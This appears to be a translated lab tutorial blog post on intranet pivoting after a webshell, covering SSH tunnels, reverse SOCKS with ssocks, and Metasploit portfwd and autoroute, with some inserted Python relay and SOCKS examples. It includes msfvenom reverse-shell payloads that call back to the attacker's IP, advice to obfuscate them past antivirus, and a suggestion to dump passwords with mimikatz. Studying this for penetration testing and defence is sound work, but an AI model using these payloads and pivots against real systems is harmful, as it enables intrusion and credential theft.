
Penetration test - Foundation - intranet penetration (17)

2020-12-07 10:02:08 osc_ sdnu59mg


Author: Dayu
Date: 2020-12-04

Introduction:

Penetration Test - Foundation Chapter:
This series goes back over the fundamentals and consolidates the notes from daily lab practice. Because they are practice notes, the steps and methods will sometimes jump around; I hope you can take something away from them all the same.

Please note:

Every terminal or server reproduced in these notes is a lab environment I built myself for penetration practice. Kali Linux is used as the attacker machine throughout. The techniques described are for educational purposes only; if they are used for any other purpose, I accept no responsibility.

Quote:

How much you care about the craft decides how far you get in it!


I. Preface

This article picks up after a webshell has been obtained and privileges escalated, and shows how to build tunnels from there. It is a foundation chapter: all basic techniques, none of them covered in depth. Enough talk; keep it brief and get on with the penetration!

Note:
What matters most is the way of thinking. An idea can be applied in many ways and there are thousands of tools; how any one tool is used comes second!!

II. Environment

Attacker: Kali 2020.4
External IP: 192.168.175.145

Web server: Ubuntu 20.04.1
External IP: 192.168.175.153
Internal IP: 10.10.1.7

Database and intranet server: Windows Server 2003
Internal IP: 10.10.1.6

Internet gateway: 192.168.175.2
[Figure: network topology]

The database/intranet server sits only on the internal network. Kali can reach nothing but the web server, where a webshell was obtained and privilege escalation succeeded. Because the web server's functionality and privileges are heavily restricted, this article shows how to use SSH tunnels to connect Kali to the Windows 2003 host, and how to push further into the internal network from there.

III. SSH Tunnels

We now have shell access to the Ubuntu web server through the webshell; how it was obtained was covered in the earlier articles!

1. SSH local (forward) port forwarding


Command (run on the web server, which has an SSH login dayu on itself):

ssh -CNfL 0.0.0.0:6666:10.10.1.6:80 dayu@127.0.0.1
# listen address:port on the web server, then the target address:port reached through the tunnel, then the SSH login that carries it
# -C compress, -N run no remote command, -f go to the background after authenticating, -L local forward

Meaning: the web server listens on 0.0.0.0:6666 and carries everything that arrives there over the SSH session to port 80 of the intranet server 10.10.1.6. The only precondition is an SSH login to act as the carrier. Kali then connects to 192.168.175.153:6666.

Requesting the intranet server's dayu-test.php page through this forward tunnel returns its content, which confirms the tunnel works.

2. SSH remote (reverse) port forwarding

Command (run on the web server):

ssh -qTfnN -R 8888:127.0.0.1:22 kali@192.168.175.145

The intranet server cannot reach Kali on its own. With a remote forward the web server opens an SSH session out to Kali and asks Kali's sshd to listen on port 8888; connections to 127.0.0.1:8888 on Kali are carried back over that session to port 22 on the web server. The same form with 10.10.1.6:<port> as the target exposes an intranet service instead. (sshd binds a -R port to loopback only unless GatewayPorts is enabled in sshd_config.)

Reverse forwarding is not what I would recommend here, but it is worth knowing: its main use is to join two networks that cannot reach each other through a host both can reach, such as a public VPS. It gets past inbound firewall restrictions because the inner host initiates the connection, but once the SSH session drops the tunnel is gone and cannot be re-entered from outside.

3. SSH dynamic (SOCKS) proxy

ssh -D port user@theserver

This is the bluntest form of SSH tunnel: it turns the SSH client into a SOCKS5 proxy on the given local port. Point a browser, proxychains or Proxifier at that SOCKS5 port and all of their traffic leaves through the SSH server. It is especially handy with a VPS.

IV. Port Forwarding

Next, port forwarding and mapping with Metasploit.


msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.175.145 LPORT=1037 -f elf > dayu.elf

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.175.145 LPORT=1037 -f elf -o shell

Generate the payload with msfvenom (x64 or x86 to match the target), obfuscate it with base64 or some other method to get past antivirus, upload it, and have it connect back to Metasploit on Kali; exploit/multi/handler must already be listening with the same payload, LHOST and LPORT. AV evasion is skipped here and will be covered later~ Everything below assumes the Meterpreter session on Ubuntu from the preface.

1. Port mapping


portfwd list		# list active forwards
portfwd flush		# remove all forwards
portfwd add -L 192.168.175.145 -l 8089 -p 80 -r 10.10.1.6
# -L local address to listen on, -l local port, -p remote port, -r remote host reached through the session

Port 80 of the intranet server 10.10.1.6 is now mapped to port 8089 on Kali.

Browsing to port 8089 locally reaches the intranet server's port 80 page directly. The idea generalises: any service on the intranet host that accepts connections can be forwarded the same way~

What is used more often in practice is to take a shell through such a forward with an msf exploit module and keep pivoting from there~

2. Port forwarding

Forwarding a port to the local machine is for special situations: when the shell alone is not enough to do the job well, or when you need the other side's desktop for further work. Below, msf forwards the Windows host's 3389 so we can log in to it with Remote Desktop.

Port 3389 has been forwarded to local port 8090.

portfwd add -l 8090 -p 3389 -r 10.10.1.6
rdesktop 127.0.0.1:8090

Running rdesktop on Kali against port 8090 lands on the other side's 3389 Remote Desktop. For the password, upload mimikatz and dump credentials...

V. SOCKS Tunnel

A SOCKS tunnel is more broadly useful than an SSH tunnel and simpler to run. Because the inner host connects outward to the attacker, it gets through firewall devices that only block inbound connections, and the attacker then proxies into the internal network through it.

1. Download and build ssocks

Download it first (it has to be built on both Kali 2020.4 and the web server):

http://sourceforge.net/projects/ssocks/

After downloading, unpack and build:

tar zxvf ssocks-0.0.14.tar.gz
cd ssocks-0.0.14
./configure && make		# configure and compile

The binaries end up in the src directory; everything needed for the tunnel is in there.

The two used here are rcsocks and rssocks.

2. Run the reverse proxy


./rcsocks -l 3333 -p 2222 -vv

On Kali, rcsocks opens two ports: 2222 (-p) waits for the remote SOCKS5 server, rssocks, to connect in, and 3333 (-l) is where local tools connect as SOCKS5 clients; rcsocks splices the two. Then wait for the remote side to reach 2222.

./rssocks -s 192.168.175.145:2222 -vv

Run on the web server, rssocks connects out to Kali's port 2222 and the SOCKS tunnel is up; anything pointed at the proxy now travels through it into the internal network.
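Both relay shapes in this article, the forward one (ssh -L, portfwd add -L) and the reverse one (rcsocks/rssocks, ssh -R), reduced to plain TCP relays as an added Python example. This is not code from the article, ssocks, OpenSSH or Metasploit; it runs entirely on loopback with kernel-chosen ports in place of 6666/8089/2222/3333, and the "intranet service" is a constructed echo server standing in for 10.10.1.6:80.

```python
# Added example: forward and reverse TCP relays on loopback. Not from the
# article or from ssocks/OpenSSH/Metasploit; ports and the echo target are
# constructed stand-ins for the article's hosts.
import socket
import threading

def _pipe(src, dst):
    """Copy src -> dst until EOF on src, then half-close dst."""
    try:
        while data := src.recv(4096):
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass

def _bridge(a, b):
    """Relay both directions between a and b, then close both."""
    t = threading.Thread(target=_pipe, args=(b, a), daemon=True)
    t.start()
    _pipe(a, b)
    t.join()
    a.close()
    b.close()

def _listen():
    """Loopback listener on a kernel-chosen port (6666/8089/2222/3333 in the article)."""
    s = socket.socket()
    s.bind(("127.0.0.1", 0))
    s.listen(5)
    return s

def _spawn(fn):
    threading.Thread(target=fn, daemon=True).start()

def echo_service():
    """Constructed stand-in for the intranet service at 10.10.1.6:80: echoes one client."""
    srv = _listen()
    def serve():
        conn, _ = srv.accept()
        _pipe(conn, conn)  # whatever arrives is sent straight back
        conn.close()
    _spawn(serve)
    return srv.getsockname()[1]

def forward_listener(target_port):
    """ssh -L / portfwd add -L: a host that can reach the target accepts the
    operator's connection here and opens a second connection onward."""
    srv = _listen()
    def serve():
        client, _ = srv.accept()
        _bridge(client, socket.create_connection(("127.0.0.1", target_port)))
    _spawn(serve)
    return srv.getsockname()[1]

def reverse_controller():
    """rcsocks -l <client> -p <agent> on the attacker: the -p port waits for the
    inner host to dial OUT to us, the -l port is for the operator's tool, and
    the two connections are spliced. Returns (agent_port, client_port)."""
    agent_srv, client_srv = _listen(), _listen()
    def serve():
        agent, _ = agent_srv.accept()    # the inner host must arrive first
        client, _ = client_srv.accept()  # the operator attaches afterwards
        _bridge(client, agent)
    _spawn(serve)
    return agent_srv.getsockname()[1], client_srv.getsockname()[1]

def reverse_agent(agent_port, target_port):
    """rssocks -s attacker:2222 (same shape as ssh -R) on the inner host: connect
    OUT to the controller, then bridge that uplink to the internal target.
    Real rssocks speaks SOCKS, so the target is chosen per request; fixed here."""
    def run():
        uplink = socket.create_connection(("127.0.0.1", agent_port))
        _bridge(uplink, socket.create_connection(("127.0.0.1", target_port)))
    _spawn(run)

def send_through(port, payload):
    """The operator's tool: send payload, half-close, collect the reply."""
    with socket.create_connection(("127.0.0.1", port), timeout=5) as s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)
        chunks = []
        while data := s.recv(4096):
            chunks.append(data)
    return b"".join(chunks)

def demo():
    """One request through each relay type; the echo service returns both unchanged."""
    fwd_port = forward_listener(echo_service())
    forward_reply = send_through(fwd_port, b"GET /dayu-test.php HTTP/1.0\r\n\r\n")
    agent_port, client_port = reverse_controller()
    reverse_agent(agent_port, echo_service())
    reverse_reply = send_through(client_port, b"hello via reverse tunnel")
    return forward_reply, reverse_reply
```

Calling demo() returns both payloads echoed back through their relays. The reverse half makes the article's point concrete: reverse_controller never connects to the inner host; the inner host dials out, and if that uplink drops the operator has no way back in.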

Next you need a tool that pushes traffic through the proxy: Firefox, proxychains or Proxifier all work. proxychains is demonstrated here.

apt install proxychains    # install

Then edit the configuration with vi /etc/proxychains4.conf

and add one SOCKS entry: socks5 127.0.0.1 3333 (the rcsocks -l port that local clients talk to; 2222 is reserved for rssocks).
There is a lot more that can be done here; this is one way of thinking about it. One problem I hit: when I loaded the gcc-compiled socks binary into gdb to study its calls, it crashed with a segmentation fault (core dumped), and the stack size issue is still unresolved. The system is Ubuntu right now, so I will leave it here and deal with it later.



This method gets traffic out through firewalls and assorted egress restrictions, as long as the inner host can make an outbound connection; very practical.

VI. Cross-Route Pivoting

This method also follows the first topology diagram. The gateway 192.168.175.2 has no route to 10.10.1.0/24, so the question is how the attacker on Kali reaches the intranet servers across that hop and operates against them.

1. View network interface information

Command:

ifconfig

The host we have a shell on is the dual-homed web server.

2. View routing state

Command:

getuid			# current user is dayu@dayu
run get_local_subnets		# list the subnets the session's host is attached to

The output shows two subnets:
Local subnet: 10.10.1.0/255.255.255.0
Local subnet: 192.168.175.0/255.255.255.0

Command:

run autoroute -p		# print the routes already added through this session

No routes have been added yet, so we add one!

3. Add a route through the session

The subnet we saw a moment ago is 10.10.1.0/24; add it here:
Command:

run autoroute -s 10.10.1.0/24		# add a route for 10.10.1.0/24 through the current session

The route for 10.10.1.0/24 is now in Metasploit's routing table (not the operating system's)!! Newer Metasploit marks the autoroute script as deprecated; run post/multi/manage/autoroute SUBNET=10.10.1.0/24 from the session, or route add 10.10.1.0 255.255.255.0 1 from the console, does the same thing.
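The decision made by hand above (two subnets seen, one route added) as an added Python example, not from the article or from Metasploit: it parses the get_local_subnets output and emits the console form of the route, skipping the subnet Kali already sits on. The subnet lines are the two shown above; the session number 1 follows the article's session 1 and is otherwise an assumption.

```python
# Added example: turn get_local_subnets output into msfconsole route commands.
# Not from the article or Metasploit; the input text is copied from the
# article's output and the session id is an assumption.
import ipaddress

# Constructed from the two lines `run get_local_subnets` printed in the article.
SUBNET_OUTPUT = """\
Local subnet: 10.10.1.0/255.255.255.0
Local subnet: 192.168.175.0/255.255.255.0
"""

def parse_local_subnets(text):
    """Return an ip_network for each 'Local subnet: <addr>/<netmask>' line.
    ipaddress accepts the dotted-netmask form as well as a prefix length,
    so 10.10.1.0/255.255.255.0 becomes 10.10.1.0/24."""
    nets = []
    for line in text.splitlines():
        if line.strip().startswith("Local subnet:"):
            spec = line.split(":", 1)[1].strip()
            nets.append(ipaddress.ip_network(spec, strict=False))
    return nets

def pivot_subnets(text, attacker_ip):
    """Keep only the subnets the attacker is NOT already on. Routing your own
    LAN (192.168.175.0/24 here) through the session would push traffic for
    Kali's own neighbours through the pivot for no reason."""
    me = ipaddress.ip_address(attacker_ip)
    return [n for n in parse_local_subnets(text)
            if me not in n and not n.is_loopback and not n.is_link_local]

def route_commands(text, attacker_ip, session_id=1):
    """msfconsole `route add <net> <netmask> <session>` lines, the console
    equivalent of `run autoroute -s <net>` inside the session. session_id=1
    mirrors the article's session number and is an assumption here."""
    return [f"route add {n.network_address} {n.netmask} {session_id}"
            for n in pivot_subnets(text, attacker_ip)]
```

route_commands(SUBNET_OUTPUT, "192.168.175.145") yields only the 10.10.1.0/24 route, which is exactly what was added above; route print in msfconsole then shows it.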

4. msf SOCKS4a proxy

Command:

background		# leave the session's interactive shell; the session stays alive and sessions <id> returns to it
use auxiliary/server/socks4a	# pick the SOCKS4a proxy module
set SRVHOST 0.0.0.0	# local listen address (the default)
set SRVPORT 1080	# proxy port, change as you like
run

Once run succeeds: the idea is that session 1 is reused. With the new route in place, any connection the SOCKS4a server receives for a routed subnet is carried through that session. (Newer Metasploit ships this as auxiliary/server/socks_proxy with VERSION set to 4a or 5.)

5. Point the local proxy at it

Command:

vi /etc/proxychains4.conf	# add the line: socks4 127.0.0.1 1080

6. Successful penetration


Command:

proxychains firefox		# start the program with its traffic sent through the proxy

With Firefox started under proxychains, its traffic goes to the SOCKS4a server, which carries it over the session into 10.10.1.0/24, and the browser lands straight on the intranet server's login page: the intranet has been reached.

proxychains also works with nmap, hydra, sqlmap and many other tools. Keep in mind that a SOCKS proxy only carries TCP connections: run nmap with -sT -Pn (no SYN scans, no ICMP, no UDP) or the results will be wrong.
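What proxychains actually puts on the wire for the two entries used in this article (socks4 127.0.0.1 1080 for the Metasploit socks4a server, socks5 127.0.0.1 3333 for rcsocks or ssh -D), as an added Python example that is not from the article, proxychains, ssocks or Metasploit. It builds the client requests and checks the proxy replies; the reply bytes fed to the parsers are constructed, and no proxy is contacted.

```python
# Added example: SOCKS4a and SOCKS5 client-side wire format, as a proxychains
# style client would produce it. Not from the article or any of the tools it
# names; hosts and ports are the article's, proxy replies are constructed.
import struct

SOCKS5_REPLY_TEXT = {0: "succeeded", 1: "general failure", 2: "not allowed",
                     3: "network unreachable", 4: "host unreachable",
                     5: "connection refused", 6: "TTL expired",
                     7: "command not supported", 8: "address type not supported"}

def socks4a_connect(host, port, userid=b""):
    """SOCKS4a CONNECT: VN=4, CD=1, DSTPORT, DSTIP=0.0.0.1 (the 4a marker that
    asks the proxy to resolve the name), USERID NUL, HOSTNAME NUL. No method
    negotiation and no authentication, which is why the msf module needs
    nothing but a port."""
    return (struct.pack("!BBH", 4, 1, port) + b"\x00\x00\x00\x01"
            + userid + b"\x00" + host.encode() + b"\x00")

def parse_socks4_reply(data):
    """8-byte reply: VN=0, CD=0x5a granted or 0x5b..0x5d rejected, then port/ip.
    Returns True when granted; raises otherwise."""
    if len(data) < 8 or data[0] != 0:
        raise ValueError("malformed SOCKS4 reply")
    if data[1] != 0x5A:
        raise ConnectionError(f"SOCKS4 request rejected, CD={data[1]:#x}")
    return True

def socks5_greeting():
    """VER=5, NMETHODS=1, METHOD=0x00 (no authentication)."""
    return b"\x05\x01\x00"

def parse_socks5_method(data):
    """The server picks one offered method; 0xFF means none was acceptable."""
    if len(data) != 2 or data[0] != 5:
        raise ValueError("malformed SOCKS5 method selection")
    if data[1] == 0xFF:
        raise ConnectionError("proxy accepts none of the offered auth methods")
    return data[1]

def socks5_connect(host, port):
    """SOCKS5 CONNECT with ATYP=3 (domain name): VER CMD RSV ATYP LEN NAME PORT.
    Sending the name lets the proxy resolve it inside the target network,
    which is what you want when pivoting."""
    name = host.encode()
    if len(name) > 255:
        raise ValueError("host name too long for ATYP 3")
    return b"\x05\x01\x00\x03" + bytes([len(name)]) + name + struct.pack("!H", port)

def parse_socks5_reply(data):
    """VER REP RSV ATYP BND.ADDR BND.PORT. Returns (rep, bound_addr, bound_port,
    bytes_consumed); anything after bytes_consumed already belongs to the
    tunnelled stream and must not be discarded."""
    if len(data) < 4 or data[0] != 5:
        raise ValueError("malformed SOCKS5 reply")
    rep, atyp = data[1], data[3]
    if atyp == 1:
        addr, off = ".".join(str(b) for b in data[4:8]), 8
    elif atyp == 3:
        n = data[4]
        addr, off = data[5:5 + n].decode(), 5 + n
    elif atyp == 4:
        addr, off = data[4:20].hex(), 20
    else:
        raise ValueError(f"unknown ATYP {atyp}")
    if len(data) < off + 2:
        raise ValueError("truncated SOCKS5 reply")
    port = struct.unpack("!H", data[off:off + 2])[0]
    if rep != 0:
        raise ConnectionError(f"CONNECT failed: {SOCKS5_REPLY_TEXT.get(rep, rep)}")
    return rep, addr, port, off + 2

def classify_first_byte(b):
    """Why a mismatched proxychains entry fails: a SOCKS4a server that sees 0x05,
    or a SOCKS5 server that sees 0x04, is being spoken to in the other protocol."""
    return {4: "socks4", 5: "socks5"}.get(b, "not SOCKS")
```

The first byte of each request is the whole reason the proxychains entries differ: Metasploit's socks4a module expects 0x04 and an unauthenticated request, rcsocks and ssh -D expect the 0x05 greeting and method selection first. Note too that parse_socks5_reply returns how many bytes it consumed, because a proxy may send the first bytes of the tunnelled data in the same packet as the reply.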

Proxifier with a system-wide proxy is even more convenient here, but it is not covered further. Learning is about the way of thinking!!

VII. Summary and Other Ideas

I have not written up my favourite, nc, because everyone finds it easy to use! Here are some other port-forwarding and proxy tools for intranet penetration that I plan to go through...

Proxifier, reGeorg, xsocket, nc, Lcx, Frp, IPsec, ngrok; that is all I can recall off the top of my head~~

There are far too many tools, each with its own strengths, and one or two are enough for one person. What matters is the way of thinking, because every penetration runs into different environments. Keep going~~

The methods above are the simplest and also the foundation. Once you have the idea of getting through a firewall, getting through other kinds of devices is no problem. But do not imagine you go unnoticed... all of this shows up as traffic behaviour, and whoever wants to catch it can.

That is it for today's foundations; basic, but they have to be kept firmly in mind.

If you found this post useful, feel free to share it with others, and you are welcome to join the free group to learn and grow together.


Copyright notice
This article was written by [osc_ sdnu59mg]; please include the original link when reposting. Thanks.
https://chowdera.com/2020/12/202012070951238308.html